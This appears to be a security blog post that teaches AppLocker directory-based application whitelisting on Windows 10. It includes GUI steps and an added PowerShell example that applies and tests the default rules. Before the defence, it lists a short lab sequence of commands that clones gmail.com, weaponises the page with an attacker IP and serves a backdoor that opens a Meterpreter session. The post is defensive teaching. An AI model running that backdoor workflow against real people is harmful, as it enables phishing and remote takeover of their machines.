John Strand //
I have quite a few calls with customers who do not know where to begin when it comes to application whitelisting.
Often, the approach some organizations take is to try and implement full application whitelisting on every single application across their entire environment. While this goal is fun and seems like a good idea, it is not.
But…. But Why?
Because the overhead is insane. It is almost a full-time job keeping up with all the changes and working through patches. Some organizations try to buy a product that does this for them.
This almost never works.
Quit reaching for the easy button. Every time you do, God deploys another bot on your network out of spite.
And, he is a vengeful God.
Don’t make him angry.
Rather, we should ask: is there a way we can get 80% of the way there? Is there a way to implement some level of whitelisting that will stop 95%+ of drive-by attacks?
In this blog, we are going to cover how we can implement whitelisting based on directory using Windows AppLocker.
But first, let’s see what happens when we do not have AppLocker running. We will set up a simple backdoor and have it connect back to the ADHD system. Remember, the goal is not to show how we can bypass EDR and Endpoint products. It is to create a simple backdoor and have it connect back.
By the way, for this, we will be using ADHD. You can find it here:
Also, we are just going to show this on a default Windows 10 system. No AV. The goal of this blog is to walk through AppLocker. Not bypass AV.
Want to bypass AV? Check the following webcast out:
First, we need some malware.
Thankfully, we have a couple of scripts that greatly simplify this process. Please make sure both your Windows and your Linux systems are running.
On your Linux system, please run the following command:
Please note the IP address of your Ethernet adapter.
Please note that my adapter is called ens33 and my IP address is 192.168.123.128. Your IP Address and adapter name may be different.
Please note your IP address for the ADHD Linux system below:
Now, run the following commands to start a simple backdoor and backdoor listener:
$ sudo su -
# cd /opt/java-web-attack/
# ./clone.sh https://gmail.com
# ./weaponize.py index.html 192.168.123.128    <<<--- Your IP will be different!!!!
# ./serve.sh
Now, let’s surf to your Linux system from your Windows system, download the malware and run it!
Now, when you go back to your ADHD Linux system, you should see a Meterpreter session:
Now, let’s stop this from happening!
First, let’s configure AppLocker. To do this, we will need to access the Local Security Policy on your Windows system as an Administrator account.
Simply press the Windows key (lower left hand of your keyboard, looks like a Windows Logo), then type Local Security. It should bring up a menu like the one below. Please select Local Security Policy.
Next, we will need to configure AppLocker. To do this, please go to Security Settings > Application Control Policies and then AppLocker.
In the right-hand pane, you will see there are 0 Rules enforced for all policies. We will add in the default rules. We will choose the defaults because we are far less likely to brick a system.
Please select each of the above Rule groups (Executable, Windows Installer, Script, and Packaged) and for each one, right-click in the area that says “There are no items to show in this view” and then select “Create Default Rules.”
This should generate a subset of rules for each group. It should look similar to how it does below:
Now, we will need to start the Application Identity Service. This is done by pressing the Windows key and typing Services. This will bring up the Services App. Please select that and then double-click “Application Identity.”
Once the Application Identity Properties dialog is open, please press the Start button. This will start the service.
Now we need to create a standard user account on your Windows system. I called mine whitelist.
Next, log out as Administrator and log back in as whitelist.
Now, let’s surf to your Linux system, download the malware and try to run it again.
You should get an error.
The goal of this is to show just how easy it is to create default rules based on directory path.
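The same Executable default rules, built and applied from PowerShell instead of the Local Security Policy GUI, as an added example that is not part of the original post. It covers the Exe collection only, assumes an elevated session on the Windows 10 test box, and $testExe is a constructed stand-in for the downloaded backdoor.

```powershell
#Requires -RunAsAdministrator
# Added example, not from the original post: AppLocker Exe default rules built as XML,
# dry-run with Test-AppLockerPolicy, applied, then checked via the AppLocker event log.
Import-Module AppLocker

# S-1-1-0 = Everyone, S-1-5-32-544 = BUILTIN\Administrators. Rule Ids are fresh GUIDs
# here; the GUI assigns its own fixed Ids, which makes no difference to enforcement.
function New-PathRuleXml([string]$Name, [string]$Path, [string]$Sid) {
    $id = [guid]::NewGuid()
    "    <FilePathRule Id=`"$id`" Name=`"$Name`" Description=`"`" UserOrGroupSid=`"$Sid`" Action=`"Allow`">`n" +
    "      <Conditions><FilePathCondition Path=`"$Path`" /></Conditions>`n" +
    "    </FilePathRule>"
}

$policyXml = @"
<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="Enabled">
$(New-PathRuleXml '(Default Rule) All files located in the Program Files folder' '%PROGRAMFILES%\*' 'S-1-1-0')
$(New-PathRuleXml '(Default Rule) All files located in the Windows folder' '%WINDIR%\*' 'S-1-1-0')
$(New-PathRuleXml '(Default Rule) All files' '*' 'S-1-5-32-544')
  </RuleCollection>
</AppLockerPolicy>
"@
$xmlPath = Join-Path $env:TEMP 'applocker-exe-defaults.xml'
Set-Content -Path $xmlPath -Value $policyXml -Encoding UTF8

# Constructed stand-in for the download: it lives outside %WINDIR% and %PROGRAMFILES%.
$testExe = Join-Path $env:TEMP 'dropped.exe'
Set-Content -Path $testExe -Value 'placeholder, not a real PE'

# Dry run against the XML before touching the live policy. Evaluated as Everyone,
# expect DeniedByDefault for $testExe and Allowed (Windows folder rule) for calc.exe.
Test-AppLockerPolicy -XmlPolicy $xmlPath -Path $testExe, 'C:\Windows\System32\calc.exe' -User 'Everyone' |
    Format-Table FilePath, PolicyDecision, MatchingRule -AutoSize

# Apply (merged with any existing local rules) and make sure Application Identity runs.
# On Windows 10 it is a protected service, so set the start type with sc.exe.
Set-AppLockerPolicy -XmlPolicy $xmlPath -Merge
sc.exe config appidsvc start= auto | Out-Null
Start-Service -Name AppIDSvc

# Re-check against the effective (now applied) policy.
Test-AppLockerPolicy -PolicyObject (Get-AppLockerPolicy -Effective) -Path $testExe -User 'Everyone'

# Once the whitelist user tries to run the file, the block is logged as event 8004
# (8002 = allowed, 8003 = would have been blocked under audit-only enforcement).
Get-WinEvent -LogName 'Microsoft-Windows-AppLocker/EXE and DLL' -MaxEvents 20 -ErrorAction SilentlyContinue |
    Where-Object Id -eq 8004 | Select-Object TimeCreated, Message
```

Administrators still match the `*` rule, which is exactly why the post has you test from the standard whitelist account rather than the admin session that applied the policy.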
Is this 100% effective? Nope. Not even close. Will it stop a tremendous amount of drive-by attacks and make most penetration testers cry?
By the way, are you looking for a webcast on how to implement this via Group Policy in Active Directory?
Cool. Check this out: